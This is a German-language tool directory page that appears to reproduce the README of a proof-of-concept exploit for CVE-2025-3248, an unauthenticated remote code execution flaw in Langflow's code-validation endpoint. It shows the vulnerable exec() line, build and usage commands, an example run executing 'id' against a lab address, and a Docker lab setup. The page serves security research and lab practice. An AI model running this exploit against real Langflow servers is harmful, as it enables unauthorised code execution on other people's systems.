Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3248-POC | Kitploit
Tools/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Langflow RCE Exploit - CVE-2025-3248

⚠️ Haftungsausschluss
Dieser Code ist ausschließlich für Bildungs- und Forschungszwecke bestimmt. Die unbefugte Verwendung auf Systemen ohne ausdrückliche Genehmigung kann einen Verstoß gegen das Gesetz darstellen.
Der Autor ist nicht verantwortlich für Missbrauch oder böswillige Aktivitäten im Zusammenhang mit diesem Tool.


Informationen zur Schwachstelle

CVE-2025-3248 - Kritisch

CVSS-Score: 9.8 | EPSS-Score: 92.57% | Veröffentlicht: 22. Mai 2025

Betroffene Versionen

  • Verwundbar: Alle Versionen ≤ v1.3.0
  • Behoben: Versionen v1.3.0+

Angriffsvektor

Der Endpunkt /api/v1/validate/code akzeptiert unbereinigten Python-Code und führt ihn direkt mit exec() aus, ohne dass eine Authentifizierung erforderlich ist.

Verwundbarer Code

root@kitploit:~
# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

Technische Analyse

Langflow stellt einen /api/v1/builder/execute_code-Endpunkt bereit, der vom Benutzer bereitgestellten Python-Code entgegennimmt und ihn direkt an exec() im Backend übergibt. Da keine Authentifizierung oder Sandboxing vorhanden ist, können Angreifer beliebige Payloads zur Codeausführung erstellen.

Exploit ausführen

Voraussetzungen

  • Rust 1.70+ (Installation über rustup)
  • Cargo (Rust-Paketmanager)
root@kitploit:~
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
root@kitploit:~
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

Beispiel:

root@kitploit:~
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

Einrichtung des lokalen Labors

Schnellstart

root@kitploit:~
> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

Labor stoppen

root@kitploit:~
> sudo docker-compose down
Tool herunterladen